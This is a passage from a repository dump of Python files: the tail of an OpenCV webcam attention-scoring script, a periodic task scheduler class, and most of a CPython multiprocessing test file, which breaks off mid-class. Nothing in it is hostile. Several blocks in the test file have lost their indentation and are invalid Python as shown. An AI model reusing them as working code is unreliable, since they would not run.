    cap = cv.VideoCapture(0)
    # LIFO queue so the reporter threads always read the *latest* score.
    q = queue.LifoQueue()
    thread = threading.Thread(target=th)
    thread.start()
    # PERF FIX: load the Haar cascades once -- the original re-parsed both
    # XML files inside the capture loop on every single frame.
    face_cascade = cv.CascadeClassifier("haarcascade_frontalface_alt.xml")
    eyes_cascade = cv.CascadeClassifier("haarcascade_eye_tree_eyeglasses.xml")
    while True:
        ret, frame = cap.read()
        frame_gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)
        frame_gray = cv.equalizeHist(frame_gray)
        # -- Detect faces
        faces = face_cascade.detectMultiScale(frame_gray)
        if any(map(len, faces)):
            if attention < 96:
                attention += 5
        else:
            if attention > 9:
                attention -= 10
        for (x, y, w, h) in faces:
            center = (x + w // 2, y + h // 2)
            frame = cv.ellipse(frame, center, (w // 2, h // 2), 0, 0, 360, (255, 0, 255), 4)
            faceROI = frame_gray[y:y + h, x:x + w]
            # -- In each face, detect eyes
            eyes = eyes_cascade.detectMultiScale(faceROI)
            if any(map(len, eyes)):
                if attention < 98:
                    attention += 3
            else:
                if attention > 6:
                    attention -= 7
            for (x2, y2, w2, h2) in eyes:
                eye_center = (x + x2 + w2 // 2, y + y2 + h2 // 2)
                radius = int(round((w2 + h2) * 0.25))
                frame = cv.circle(frame, eye_center, radius, (255, 0, 0), 4)
        q.put(attention)
        cv.imshow('Capture - Face detection', frame)
        # ESC quits.
        if cv.waitKey(10) == 27:
            break
    # Resource cleanup on exit (the original leaked the capture device).
    cap.release()
    cv.destroyAllWindows()
|
tasks.py | from threading import Thread
import sched
import time
class Task:
    """A stoppable, pausable background task that invokes a callable
    periodically on its own thread, using sched to avoid timing drift."""

    def __init__(self, type=None):
        # 'type' shadows the builtin, but the parameter name is kept for
        # interface compatibility with existing callers.
        self.active = False
        self.paused = False
        self.thread = None
        self.type = type

    def __start__(self, target, period):
        """Begin invoking *target* every *period* seconds on a new
        thread."""
        self.active = True
        self.thread = Thread(target=self.__run_periodic__,
                             kwargs={'target': target, 'period': period})
        self.thread.start()

    def __stop__(self):
        """Ask the background thread to exit after its current cycle."""
        self.active = False

    def __run_periodic__(self, target, period):
        ''' If a period is passed, uses Python's sched library to
        avoid timing drifts. Make sure that the passed period is longer than
        the time required to call the target function.
        Args:
            period (float): the repetition time in seconds
        '''
        scheduler = sched.scheduler(time.time, time.sleep)
        last_time = time.time()
        while self.active:
            if self.paused:
                # Sleep briefly instead of busy-spinning while paused.
                time.sleep(min(period, 0.05))
                continue
            new_time = time.time()
            # BUG FIX: the original test was `if last_time < new_time`,
            # which is true on the very first iteration (the clock always
            # advances a little between the two time() calls), so the loop
            # warned and resynced forever and *target* never ran. Resync
            # only when we have fallen more than one period behind.
            if new_time > last_time + period:
                print('Warning: skipping missed tasks and resyncing the time cursor.')
                last_time = new_time
                continue
            scheduler.enterabs(last_time, 1, target)
            last_time += period
            scheduler.run()
|
_test_multiprocessing.py | #
# Unit tests for the multiprocessing package
#
import unittest
import queue as pyqueue
import contextlib
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import weakref
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
# Timeout to wait until a process completes
TIMEOUT = 30.0 # seconds
def latin(s):
    """Encode *s* as Latin-1 bytes (test fixtures need byte strings)."""
    return bytes(s, 'latin')
def close_queue(queue):
    """Close a multiprocessing Queue and wait for its feeder thread; any
    other queue-like object (manager proxy, dummy queue) is left alone."""
    if not isinstance(queue, multiprocessing.queues.Queue):
        return
    queue.close()
    queue.join_thread()
def join_process(process):
# Join *process* with the global TIMEOUT so a hung child cannot stall
# the whole test run.
# Since multiprocessing.Process has the same API as threading.Thread
# (join() and is_alive()), the threading support helper can be reused.
support.join_thread(process, timeout=TIMEOUT)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
# Slack (seconds) allowed in timing comparisons.
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
# True unless the platform's semaphores cannot report their value (then
# get_value-based assertions are skipped).
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
    """Wait until *handle* is ready; a negative timeout means block
    forever (multiprocessing.connection.wait expresses that as None)."""
    effective = None if (timeout is not None and timeout < 0.0) else timeout
    return wait([handle], effective)
try:
    MAXFD = os.sysconf("SC_OPEN_MAX")
except (AttributeError, ValueError, OSError):
    # BUG FIX: was a bare `except:` (which also swallows KeyboardInterrupt
    # and SystemExit). sysconf is missing on non-POSIX (AttributeError),
    # and raises ValueError/OSError for unknown or unsupported names;
    # fall back to a conservative default.
    MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
# ctypes is optional on some minimal builds; substitute inert
# placeholders so tests depending on them can detect and skip.
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
    """Check that the system supports enough semaphores to run the test."""
    # POSIX guarantees at least this many semaphores.
    nsems_min = 256
    try:
        nsems = os.sysconf("SC_SEM_NSEMS_MAX")
    except (AttributeError, ValueError):
        # sysconf not available or setting not available: assume it is fine.
        return
    if nsems != -1 and nsems < nsems_min:
        raise unittest.SkipTest("The OS doesn't support enough semaphores "
                                "to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
    """Callable proxy recording how long the last invocation took.

    After each call, ``self.elapsed`` holds the wall-clock duration in
    seconds (set even when the wrapped function raises).
    """
    def __init__(self, func):
        self.func = func
        self.elapsed = None
    def __call__(self, *args, **kwds):
        start = time.time()
        try:
            return self.func(*args, **kwds)
        finally:
            # Record the duration even on exception paths.
            self.elapsed = time.time() - start
#
# Base class for test cases
#
class BaseTestCase(object):
    """Shared helpers mixed into the per-flavour multiprocessing test cases."""
    ALLOWED_TYPES = ('processes', 'manager', 'threads')
    def assertTimingAlmostEqual(self, a, b):
        # Timing comparisons are only meaningful when explicitly enabled.
        if CHECK_TIMINGS:
            self.assertAlmostEqual(a, b, 1)
    def assertReturnsIfImplemented(self, value, func, *args):
        # Treat NotImplementedError from *func* as "cannot check here".
        try:
            result = func(*args)
        except NotImplementedError:
            return None
        return self.assertEqual(value, result)
    # For the sanity of Windows users, rather than crashing or freezing in
    # multiple ways.
    def __reduce__(self, *args):
        raise NotImplementedError("shouldn't try to pickle a test case")
    __reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
    """Return the current value of a semaphore-like object.

    Tries, in order, the public ``get_value()`` accessor and the private
    attributes used by the various Semaphore implementations; raises
    NotImplementedError when none of them exists.
    """
    try:
        return self.get_value()
    except AttributeError:
        pass
    try:
        return self._Semaphore__value
    except AttributeError:
        pass
    try:
        return self._value
    except AttributeError:
        raise NotImplementedError
#
# Testcases
#
class DummyCallable:
    """Picklable callable target used to check Process drops its target ref."""
    def __call__(self, q, c):
        # The second argument must round-trip as a DummyCallable instance.
        assert isinstance(c, DummyCallable)
        q.put(5)
class _TestProcess(BaseTestCase):
    """Behavioural tests for Process objects, also run against threads.

    ``self.Process``, ``self.Queue``, ``self.current_process`` etc. are
    supplied by the flavour mixins, so the same checks cover both
    process- and thread-backed implementations where allowed.
    """
    ALLOWED_TYPES = ('processes', 'threads')
    def test_current(self):
        if self.TYPE == 'threads':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        current = self.current_process()
        authkey = current.authkey
        self.assertTrue(current.is_alive())
        self.assertTrue(not current.daemon)
        self.assertIsInstance(authkey, bytes)
        self.assertTrue(len(authkey) > 0)
        self.assertEqual(current.ident, os.getpid())
        self.assertEqual(current.exitcode, None)
    def test_daemon_argument(self):
        if self.TYPE == "threads":
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # By default uses the current process's daemon flag.
        proc0 = self.Process(target=self._test)
        self.assertEqual(proc0.daemon, self.current_process().daemon)
        proc1 = self.Process(target=self._test, daemon=True)
        self.assertTrue(proc1.daemon)
        proc2 = self.Process(target=self._test, daemon=False)
        self.assertFalse(proc2.daemon)
    @classmethod
    def _test(cls, q, *args, **kwds):
        # Child side: echo arguments and identity back through the queue.
        current = cls.current_process()
        q.put(args)
        q.put(kwds)
        q.put(current.name)
        if cls.TYPE != 'threads':
            q.put(bytes(current.authkey))
            q.put(current.pid)
    def test_process(self):
        q = self.Queue(1)
        e = self.Event()
        args = (q, 1, 2)
        kwargs = {'hello':23, 'bye':2.54}
        name = 'SomeProcess'
        p = self.Process(
            target=self._test, args=args, kwargs=kwargs, name=name
            )
        p.daemon = True
        current = self.current_process()
        if self.TYPE != 'threads':
            self.assertEqual(p.authkey, current.authkey)
        self.assertEqual(p.is_alive(), False)
        self.assertEqual(p.daemon, True)
        self.assertNotIn(p, self.active_children())
        self.assertTrue(type(self.active_children()) is list)
        self.assertEqual(p.exitcode, None)
        p.start()
        self.assertEqual(p.exitcode, None)
        self.assertEqual(p.is_alive(), True)
        self.assertIn(p, self.active_children())
        self.assertEqual(q.get(), args[1:])
        self.assertEqual(q.get(), kwargs)
        self.assertEqual(q.get(), p.name)
        if self.TYPE != 'threads':
            self.assertEqual(q.get(), current.authkey)
            self.assertEqual(q.get(), p.pid)
        p.join()
        self.assertEqual(p.exitcode, 0)
        self.assertEqual(p.is_alive(), False)
        self.assertNotIn(p, self.active_children())
        close_queue(q)
    @classmethod
    def _sleep_some(cls):
        # Child helper: sleep "forever" so the parent can terminate/kill it.
        time.sleep(100)
    @classmethod
    def _test_sleep(cls, delay):
        time.sleep(delay)
    def _kill_process(self, meth):
        # Start a long-sleeping child, apply *meth* (terminate or kill)
        # to it, and return the child's exit code.
        if self.TYPE == 'threads':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        p = self.Process(target=self._sleep_some)
        p.daemon = True
        p.start()
        self.assertEqual(p.is_alive(), True)
        self.assertIn(p, self.active_children())
        self.assertEqual(p.exitcode, None)
        join = TimingWrapper(p.join)
        self.assertEqual(join(0), None)
        self.assertTimingAlmostEqual(join.elapsed, 0.0)
        self.assertEqual(p.is_alive(), True)
        self.assertEqual(join(-1), None)
        self.assertTimingAlmostEqual(join.elapsed, 0.0)
        self.assertEqual(p.is_alive(), True)
        # XXX maybe terminating too soon causes the problems on Gentoo...
        time.sleep(1)
        meth(p)
        if hasattr(signal, 'alarm'):
            # On the Gentoo buildbot waitpid() often seems to block forever.
            # We use alarm() to interrupt it if it blocks for too long.
            def handler(*args):
                raise RuntimeError('join took too long: %s' % p)
            old_handler = signal.signal(signal.SIGALRM, handler)
            try:
                signal.alarm(10)
                self.assertEqual(join(), None)
            finally:
                signal.alarm(0)
                signal.signal(signal.SIGALRM, old_handler)
        else:
            self.assertEqual(join(), None)
        self.assertTimingAlmostEqual(join.elapsed, 0.0)
        self.assertEqual(p.is_alive(), False)
        self.assertNotIn(p, self.active_children())
        p.join()
        return p.exitcode
    def test_terminate(self):
        exitcode = self._kill_process(multiprocessing.Process.terminate)
        if os.name != 'nt':
            self.assertEqual(exitcode, -signal.SIGTERM)
    def test_kill(self):
        exitcode = self._kill_process(multiprocessing.Process.kill)
        if os.name != 'nt':
            self.assertEqual(exitcode, -signal.SIGKILL)
    def test_cpu_count(self):
        try:
            cpus = multiprocessing.cpu_count()
        except NotImplementedError:
            cpus = 1
        self.assertTrue(type(cpus) is int)
        self.assertTrue(cpus >= 1)
    def test_active_children(self):
        self.assertEqual(type(self.active_children()), list)
        p = self.Process(target=time.sleep, args=(DELTA,))
        self.assertNotIn(p, self.active_children())
        p.daemon = True
        p.start()
        self.assertIn(p, self.active_children())
        p.join()
        self.assertNotIn(p, self.active_children())
    @classmethod
    def _test_recursion(cls, wconn, id):
        # Recursively spawn a small tree of children, each reporting its
        # path (a list of 0/1 indices) over the shared pipe end.
        wconn.send(id)
        if len(id) < 2:
            for i in range(2):
                p = cls.Process(
                    target=cls._test_recursion, args=(wconn, id+[i])
                    )
                p.start()
                p.join()
    def test_recursion(self):
        rconn, wconn = self.Pipe(duplex=False)
        self._test_recursion(wconn, [])
        time.sleep(DELTA)
        result = []
        while rconn.poll():
            result.append(rconn.recv())
        # Depth-first order of the spawned tree.
        expected = [
            [],
            [0],
            [0, 0],
            [0, 1],
            [1],
            [1, 0],
            [1, 1]
            ]
        self.assertEqual(result, expected)
    @classmethod
    def _test_sentinel(cls, event):
        event.wait(10.0)
    def test_sentinel(self):
        if self.TYPE == "threads":
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        event = self.Event()
        p = self.Process(target=self._test_sentinel, args=(event,))
        # sentinel is only available after start().
        with self.assertRaises(ValueError):
            p.sentinel
        p.start()
        self.addCleanup(p.join)
        sentinel = p.sentinel
        self.assertIsInstance(sentinel, int)
        self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
        event.set()
        p.join()
        self.assertTrue(wait_for_handle(sentinel, timeout=1))
    @classmethod
    def _test_close(cls, rc=0, q=None):
        if q is not None:
            q.get()
        sys.exit(rc)
    def test_close(self):
        if self.TYPE == "threads":
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        q = self.Queue()
        p = self.Process(target=self._test_close, kwargs={'q': q})
        p.daemon = True
        p.start()
        self.assertEqual(p.is_alive(), True)
        # Child is still alive, cannot close
        with self.assertRaises(ValueError):
            p.close()
        q.put(None)
        p.join()
        self.assertEqual(p.is_alive(), False)
        self.assertEqual(p.exitcode, 0)
        p.close()
        # All further operations on a closed Process must raise.
        with self.assertRaises(ValueError):
            p.is_alive()
        with self.assertRaises(ValueError):
            p.join()
        with self.assertRaises(ValueError):
            p.terminate()
        p.close()
        wr = weakref.ref(p)
        del p
        gc.collect()
        self.assertIs(wr(), None)
        close_queue(q)
    def test_many_processes(self):
        if self.TYPE == 'threads':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        sm = multiprocessing.get_start_method()
        N = 5 if sm == 'spawn' else 100
        # Try to overwhelm the forkserver loop with events
        procs = [self.Process(target=self._test_sleep, args=(0.01,))
                 for i in range(N)]
        for p in procs:
            p.start()
        for p in procs:
            join_process(p)
        for p in procs:
            self.assertEqual(p.exitcode, 0)
        procs = [self.Process(target=self._sleep_some)
                 for i in range(N)]
        for p in procs:
            p.start()
        time.sleep(0.001)  # let the children start...
        for p in procs:
            p.terminate()
        for p in procs:
            join_process(p)
        if os.name != 'nt':
            exitcodes = [-signal.SIGTERM]
            if sys.platform == 'darwin':
                # bpo-31510: On macOS, killing a freshly started process with
                # SIGTERM sometimes kills the process with SIGKILL.
                exitcodes.append(-signal.SIGKILL)
            for p in procs:
                self.assertIn(p.exitcode, exitcodes)
    def test_lose_target_ref(self):
        c = DummyCallable()
        wr = weakref.ref(c)
        q = self.Queue()
        p = self.Process(target=c, args=(q, c))
        del c
        p.start()
        p.join()
        # The Process must not keep the target alive after the run.
        self.assertIs(wr(), None)
        self.assertEqual(q.get(), 5)
        close_queue(q)
    @classmethod
    def _test_child_fd_inflation(self, evt, q):
        # Child: report our fd count, then wait so all children overlap.
        q.put(test.support.fd_count())
        evt.wait()
    def test_child_fd_inflation(self):
        # Number of fds in child processes should not grow with the
        # number of running children.
        if self.TYPE == 'threads':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        sm = multiprocessing.get_start_method()
        if sm == 'fork':
            # The fork method by design inherits all fds from the parent,
            # trying to go against it is a lost battle
            self.skipTest('test not appropriate for {}'.format(sm))
        N = 5
        evt = self.Event()
        q = self.Queue()
        procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
                 for i in range(N)]
        for p in procs:
            p.start()
        try:
            fd_counts = [q.get() for i in range(N)]
            self.assertEqual(len(set(fd_counts)), 1, fd_counts)
        finally:
            evt.set()
            for p in procs:
                p.join()
            close_queue(q)
    @classmethod
    def _test_wait_for_threads(self, evt):
        # Child: start one non-daemon thread that sets the event, and one
        # daemon thread that would clear it much later if awaited.
        def func1():
            time.sleep(0.5)
            evt.set()
        def func2():
            time.sleep(20)
            evt.clear()
        threading.Thread(target=func1).start()
        threading.Thread(target=func2, daemon=True).start()
    def test_wait_for_threads(self):
        # A child process should wait for non-daemonic threads to end
        # before exiting
        if self.TYPE == 'threads':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        evt = self.Event()
        proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
        proc.start()
        proc.join()
        self.assertTrue(evt.is_set())
    @classmethod
    def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
        # NOTE: the mutable default is safe here -- the mapping is only
        # iterated, never mutated.
        for stream_name, action in break_std_streams.items():
            if action == 'close':
                stream = io.StringIO()
                stream.close()
            else:
                assert action == 'remove'
                stream = None
            setattr(sys, stream_name, None)
        evt.set()
    def test_error_on_stdio_flush_1(self):
        # Check that Process works with broken standard streams
        streams = [io.StringIO(), None]
        streams[0].close()
        for stream_name in ('stdout', 'stderr'):
            for stream in streams:
                old_stream = getattr(sys, stream_name)
                setattr(sys, stream_name, stream)
                try:
                    evt = self.Event()
                    proc = self.Process(target=self._test_error_on_stdio_flush,
                                        args=(evt,))
                    proc.start()
                    proc.join()
                    self.assertTrue(evt.is_set())
                    self.assertEqual(proc.exitcode, 0)
                finally:
                    setattr(sys, stream_name, old_stream)
    def test_error_on_stdio_flush_2(self):
        # Same as test_error_on_stdio_flush_1(), but standard streams are
        # broken by the child process
        for stream_name in ('stdout', 'stderr'):
            for action in ('close', 'remove'):
                old_stream = getattr(sys, stream_name)
                try:
                    evt = self.Event()
                    proc = self.Process(target=self._test_error_on_stdio_flush,
                                        args=(evt, {stream_name: action}))
                    proc.start()
                    proc.join()
                    self.assertTrue(evt.is_set())
                    self.assertEqual(proc.exitcode, 0)
                finally:
                    setattr(sys, stream_name, old_stream)
    @classmethod
    def _sleep_and_set_event(self, evt, delay=0.0):
        time.sleep(delay)
        evt.set()
    def check_forkserver_death(self, signum):
        # bpo-31308: if the forkserver process has died, we should still
        # be able to create and run new Process instances (the forkserver
        # is implicitly restarted).
        if self.TYPE == 'threads':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        sm = multiprocessing.get_start_method()
        if sm != 'forkserver':
            # The fork method by design inherits all fds from the parent,
            # trying to go against it is a lost battle
            self.skipTest('test not appropriate for {}'.format(sm))
        from multiprocessing.forkserver import _forkserver
        _forkserver.ensure_running()
        # First process sleeps 500 ms
        delay = 0.5
        evt = self.Event()
        proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
        proc.start()
        pid = _forkserver._forkserver_pid
        os.kill(pid, signum)
        # give time to the fork server to die and time to proc to complete
        time.sleep(delay * 2.0)
        evt2 = self.Event()
        proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
        proc2.start()
        proc2.join()
        self.assertTrue(evt2.is_set())
        self.assertEqual(proc2.exitcode, 0)
        proc.join()
        self.assertTrue(evt.is_set())
        self.assertIn(proc.exitcode, (0, 255))
    def test_forkserver_sigint(self):
        # Catchable signal
        self.check_forkserver_death(signal.SIGINT)
    def test_forkserver_sigkill(self):
        # Uncatchable signal
        if os.name != 'nt':
            self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
    """Tests for user-defined Process subclasses and interpreter shutdown."""
    ALLOWED_TYPES = ('processes',)
    def test_subclassing(self):
        uppercaser = _UpperCaser()
        uppercaser.daemon = True
        uppercaser.start()
        self.assertEqual(uppercaser.submit('hello'), 'HELLO')
        self.assertEqual(uppercaser.submit('world'), 'WORLD')
        uppercaser.stop()
        uppercaser.join()
    def test_stderr_flush(self):
        # sys.stderr is flushed at process shutdown (issue #13812)
        if self.TYPE == "threads":
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        testfn = test.support.TESTFN
        self.addCleanup(test.support.unlink, testfn)
        proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
        proc.start()
        proc.join()
        with open(testfn, 'r') as f:
            err = f.read()
            # The whole traceback was printed
            self.assertIn("ZeroDivisionError", err)
            self.assertIn("test_multiprocessing.py", err)
            self.assertIn("1/0 # MARKER", err)
    @classmethod
    def _test_stderr_flush(cls, testfn):
        # Child: point stderr at a file, then crash so the traceback has
        # to be flushed to it during shutdown.
        fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
        sys.stderr = open(fd, 'w', closefd=False)
        1/0 # MARKER
    @classmethod
    def _test_sys_exit(cls, reason, testfn):
        # Child: point stderr at a file and exit with *reason*.
        fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
        sys.stderr = open(fd, 'w', closefd=False)
        sys.exit(reason)
    def test_sys_exit(self):
        # See Issue 13854
        if self.TYPE == 'threads':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        testfn = test.support.TESTFN
        self.addCleanup(test.support.unlink, testfn)
        # Non-integer exit reasons are printed and become exit code 1.
        for reason in (
            [1, 2, 3],
            'ignore this',
        ):
            p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
            p.daemon = True
            p.start()
            join_process(p)
            self.assertEqual(p.exitcode, 1)
            with open(testfn, 'r') as f:
                content = f.read()
            self.assertEqual(content.rstrip(), str(reason))
            os.unlink(testfn)
        # Integer-like reasons become the exit code directly.
        for reason in (True, False, 8):
            p = self.Process(target=sys.exit, args=(reason,))
            p.daemon = True
            p.start()
            join_process(p)
            self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
    """True when *q* currently holds no items (works for proxies too)."""
    if hasattr(q, 'empty'):
        return q.empty()
    return q.qsize() == 0
def queue_full(q, maxsize):
    """True when *q* holds exactly *maxsize* items (works for proxies too)."""
    if hasattr(q, 'full'):
        return q.full()
    return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
    """Tests for Queue/JoinableQueue semantics across all flavours."""
    @classmethod
    def _test_put(cls, queue, child_can_start, parent_can_continue):
        # Child: drain the six items the parent put, then let it continue.
        child_can_start.wait()
        for i in range(6):
            queue.get()
        parent_can_continue.set()
    def test_put(self):
        MAXSIZE = 6
        queue = self.Queue(maxsize=MAXSIZE)
        child_can_start = self.Event()
        parent_can_continue = self.Event()
        proc = self.Process(
            target=self._test_put,
            args=(queue, child_can_start, parent_can_continue)
            )
        proc.daemon = True
        proc.start()
        self.assertEqual(queue_empty(queue), True)
        self.assertEqual(queue_full(queue, MAXSIZE), False)
        # Exercise every put() calling convention.
        queue.put(1)
        queue.put(2, True)
        queue.put(3, True, None)
        queue.put(4, False)
        queue.put(5, False, None)
        queue.put_nowait(6)
        # the values may be in buffer but not yet in pipe so sleep a bit
        time.sleep(DELTA)
        self.assertEqual(queue_empty(queue), False)
        self.assertEqual(queue_full(queue, MAXSIZE), True)
        put = TimingWrapper(queue.put)
        put_nowait = TimingWrapper(queue.put_nowait)
        self.assertRaises(pyqueue.Full, put, 7, False)
        self.assertTimingAlmostEqual(put.elapsed, 0)
        self.assertRaises(pyqueue.Full, put, 7, False, None)
        self.assertTimingAlmostEqual(put.elapsed, 0)
        self.assertRaises(pyqueue.Full, put_nowait, 7)
        self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
        self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
        self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
        self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
        self.assertTimingAlmostEqual(put.elapsed, 0)
        self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
        self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
        child_can_start.set()
        parent_can_continue.wait()
        self.assertEqual(queue_empty(queue), True)
        self.assertEqual(queue_full(queue, MAXSIZE), False)
        proc.join()
        close_queue(queue)
    @classmethod
    def _test_get(cls, queue, child_can_start, parent_can_continue):
        # Child: feed the values that the parent will read back.
        child_can_start.wait()
        #queue.put(1)
        queue.put(2)
        queue.put(3)
        queue.put(4)
        queue.put(5)
        parent_can_continue.set()
    def test_get(self):
        queue = self.Queue()
        child_can_start = self.Event()
        parent_can_continue = self.Event()
        proc = self.Process(
            target=self._test_get,
            args=(queue, child_can_start, parent_can_continue)
            )
        proc.daemon = True
        proc.start()
        self.assertEqual(queue_empty(queue), True)
        child_can_start.set()
        parent_can_continue.wait()
        time.sleep(DELTA)
        self.assertEqual(queue_empty(queue), False)
        # Hangs unexpectedly, remove for now
        #self.assertEqual(queue.get(), 1)
        # Exercise every get() calling convention.
        self.assertEqual(queue.get(True, None), 2)
        self.assertEqual(queue.get(True), 3)
        self.assertEqual(queue.get(timeout=1), 4)
        self.assertEqual(queue.get_nowait(), 5)
        self.assertEqual(queue_empty(queue), True)
        get = TimingWrapper(queue.get)
        get_nowait = TimingWrapper(queue.get_nowait)
        self.assertRaises(pyqueue.Empty, get, False)
        self.assertTimingAlmostEqual(get.elapsed, 0)
        self.assertRaises(pyqueue.Empty, get, False, None)
        self.assertTimingAlmostEqual(get.elapsed, 0)
        self.assertRaises(pyqueue.Empty, get_nowait)
        self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
        self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
        self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
        self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
        self.assertTimingAlmostEqual(get.elapsed, 0)
        self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
        self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
        proc.join()
        close_queue(queue)
    @classmethod
    def _test_fork(cls, queue):
        for i in range(10, 20):
            queue.put(i)
        # note that at this point the items may only be buffered, so the
        # process cannot shutdown until the feeder thread has finished
        # pushing items onto the pipe.
    def test_fork(self):
        # Old versions of Queue would fail to create a new feeder
        # thread for a forked process if the original process had its
        # own feeder thread.  This test checks that this no longer
        # happens.
        queue = self.Queue()
        # put items on queue so that main process starts a feeder thread
        for i in range(10):
            queue.put(i)
        # wait to make sure thread starts before we fork a new process
        time.sleep(DELTA)
        # fork process
        p = self.Process(target=self._test_fork, args=(queue,))
        p.daemon = True
        p.start()
        # check that all expected items are in the queue
        for i in range(20):
            self.assertEqual(queue.get(), i)
        self.assertRaises(pyqueue.Empty, queue.get, False)
        p.join()
        close_queue(queue)
    def test_qsize(self):
        q = self.Queue()
        try:
            self.assertEqual(q.qsize(), 0)
        except NotImplementedError:
            self.skipTest('qsize method not implemented')
        q.put(1)
        self.assertEqual(q.qsize(), 1)
        q.put(5)
        self.assertEqual(q.qsize(), 2)
        q.get()
        self.assertEqual(q.qsize(), 1)
        q.get()
        self.assertEqual(q.qsize(), 0)
        close_queue(q)
    @classmethod
    def _test_task_done(cls, q):
        # Worker: mark each item done after a short delay; None stops it.
        for obj in iter(q.get, None):
            time.sleep(DELTA)
            q.task_done()
    def test_task_done(self):
        queue = self.JoinableQueue()
        workers = [self.Process(target=self._test_task_done, args=(queue,))
                   for i in range(4)]
        for p in workers:
            p.daemon = True
            p.start()
        for i in range(10):
            queue.put(i)
        # join() must return once every item has been task_done()'d.
        queue.join()
        for p in workers:
            queue.put(None)
        for p in workers:
            p.join()
        close_queue(queue)
    def test_no_import_lock_contention(self):
        with test.support.temp_cwd():
            module_name = 'imported_by_an_imported_module'
            with open(module_name + '.py', 'w') as f:
                f.write("""if 1:
                    import multiprocessing
                    q = multiprocessing.Queue()
                    q.put('knock knock')
                    q.get(timeout=3)
                    q.close()
                    del q
                """)
            with test.support.DirsOnSysPath(os.getcwd()):
                try:
                    __import__(module_name)
                except pyqueue.Empty:
                    self.fail("Probable regression on import lock contention;"
                              " see Issue #22853")
    def test_timeout(self):
        q = multiprocessing.Queue()
        start = time.time()
        self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
        delta = time.time() - start
        # bpo-30317: Tolerate a delta of 100 ms because of the bad clock
        # resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
        # failed because the delta was only 135.8 ms.
        self.assertGreaterEqual(delta, 0.100)
        close_queue(q)
    def test_queue_feeder_donot_stop_onexc(self):
        # bpo-30414: verify feeder handles exceptions correctly
        if self.TYPE != 'processes':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        class NotSerializable(object):
